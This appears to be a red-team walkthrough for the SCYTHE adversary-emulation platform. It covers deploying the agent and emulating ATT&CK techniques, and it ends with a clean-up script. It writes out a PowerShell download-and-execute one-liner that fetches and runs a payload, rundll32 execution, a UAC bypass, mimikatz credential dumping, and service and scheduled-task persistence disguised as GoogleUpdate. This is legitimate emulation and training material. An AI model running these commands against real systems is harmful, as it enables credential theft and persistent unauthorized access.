# SCYTHE

## Setup Campaign

Log in to your SCYTHE instance via a web browser. The default port is 8443.

<https://localhost:8443>

Campaign Manager - New Campaign

Select the following options:

* Name: unique name for the campaign
* Target Operating System: Windows, Linux, or macOS
* Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
* Communication Module:
  * HTTPS is the default
  * DNS, HTTP, and Stego require relays to be installed on the redirector
  * Google Sheet and Twitter require a third-party account/API

### Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github: <https://github.com/scythe-io/community-threats>

Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import

![Migrate Threats](https://684924954-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M1RMhTtc0RlMwyXtAM5%2F-M8vaQr7k8Hk7azdiB9j%2F-M8voVnCLKXoE5wYieHq%2Fimage.png?alt=media\&token=306f381d-8a28-4e1c-a0b7-a2a0244d2ac7)

Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

## Deploy Payload

### User Execution: Malicious File (T1204.002)

Download the binary from SCYTHE to the target system and execute it by double-clicking.

### Signed Binary Proxy Execution: Rundll32 (T1218.011)

Download the DLL file from SCYTHE and execute the command below from cmd.exe (run it from the directory containing the DLL, or give the full path to the DLL):

```
rundll32.exe ServiceLogin.dll,PlatformClientMain
```

### Command and Scripting Interpreter: PowerShell (T1059.001)

Open powershell.exe and run the following download-and-execute one-liner (the URL and token are specific to the SCYTHE instance and campaign; use the values from your own campaign):

```
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;
```

## Emulate TTPs

From the campaign console, load the `run` module and execute commands on the target:

```
loader --load run
run whoami
run cmd /c whoami
```

### Load Python Runtime

```
loader --load-runtime python3
list modules
loader --load "modulename"
"modulename" 
```

### Download files

Copy a file from the SCYTHE virtual file system (VFS) to the target host:

```
loader --load downloader 
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll
```

### Privilege Escalation (TA0004)

#### Bypass User Account Control (T1548.002, formerly T1088)

```
loader --load elevate 
elevate --prompt
```

### Credential Access (TA0006)

#### Credential Dumping (T1003)

```
loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords
```

### Persistence (TA0003)

#### Create or Modify System Process: Windows Service (T1543.003, formerly T1050)

```
loader --load persist 

Syntax:
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description "Description" --path \\"hostname"\C$\"location"

Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe
```

#### Scheduled Task/Job: Scheduled Task (T1053.005)

Register an ONLOGON task that relaunches the DNS client DLL through rundll32 at every logon:

```
schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"
```

## Clean up

### Persistence

Remove the service and its binary created above. Note that the scheduled task registered above is not removed by these two commands; delete it separately before shutting down the agent.

```
run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe
```
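To confirm the artifacts are actually gone, and to cover the ONLOGON task that the commands above do not remove, the following PowerShell script (an added example, not part of the original page or of SCYTHE's own tooling) checks for and removes every persistence artifact created in this walkthrough. It assumes the names used above: service `GoogleUpdate` with binary `C:\Windows\Temp\GoogleUpdate.exe`, scheduled task `DNS`, and the DLL at `C:\Users\sec564\DNS_scythe_client32.dll` (the downloader destination). Run it from an elevated PowerShell on the target after `controller --shutdown`, since the agent may still hold the DLL open while it is running.

```powershell
# Added example (not part of the original page or SCYTHE's tooling): verify that the
# persistence artifacts from this walkthrough exist, remove all of them, and re-check.
# Assumed names/paths (taken from the examples above):
$ServiceName = 'GoogleUpdate'
$ServiceBin  = 'C:\Windows\Temp\GoogleUpdate.exe'
$TaskName    = 'DNS'
$ClientDll   = 'C:\Users\sec564\DNS_scythe_client32.dll'

function Get-PersistenceState {
    # One object describing which artifacts are still present on this host.
    [PSCustomObject]@{
        Service    = [bool](Get-Service -Name $ServiceName -ErrorAction SilentlyContinue)
        Task       = [bool](Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue)
        ServiceBin = Test-Path -LiteralPath $ServiceBin
        ClientDll  = Test-Path -LiteralPath $ClientDll
    }
}

function Get-PersistenceEvents {
    # Evidence a defender would have: 7045 = new service installed (System log),
    # 4698 = scheduled task created (Security log; requires task-scheduler auditing).
    $since = (Get-Date).AddHours(-24)
    $svc  = Get-WinEvent -FilterHashtable @{LogName='System';   Id=7045; StartTime=$since} -ErrorAction SilentlyContinue |
            Where-Object { $_.Message -match [regex]::Escape($ServiceName) }
    $task = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4698; StartTime=$since} -ErrorAction SilentlyContinue |
            Where-Object { $_.Message -match [regex]::Escape($TaskName) }
    [PSCustomObject]@{ ServiceInstallEvents = @($svc).Count; TaskCreateEvents = @($task).Count }
}

function Remove-Persistence {
    # Service: stop it, then delete it (same effect as `sc delete` in the clean-up step).
    if (Get-Service -Name $ServiceName -ErrorAction SilentlyContinue) {
        Stop-Service -Name $ServiceName -Force -ErrorAction SilentlyContinue
        & sc.exe delete $ServiceName | Out-Null
    }
    # Scheduled task: the page's clean-up block does not remove this one.
    if (Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue) {
        Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
    }
    # Dropped files: the service binary and the DNS client DLL.
    foreach ($f in @($ServiceBin, $ClientDll)) {
        if (Test-Path -LiteralPath $f) { Remove-Item -LiteralPath $f -Force }
    }
}

Write-Host 'Before clean-up:'
Get-PersistenceState  | Format-List
Get-PersistenceEvents | Format-List
Remove-Persistence
Write-Host 'After clean-up (all four should be False):'
Get-PersistenceState  | Format-List
```

If any artifact is still reported as present after the script runs, the usual cause is a file lock held by a process that loaded the DLL (check with `tasklist /m DNS_scythe_client32.dll`) or the service still being in a stopping state; wait a few seconds and rerun the clean-up.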

### Kill agent

```
controller --shutdown
```
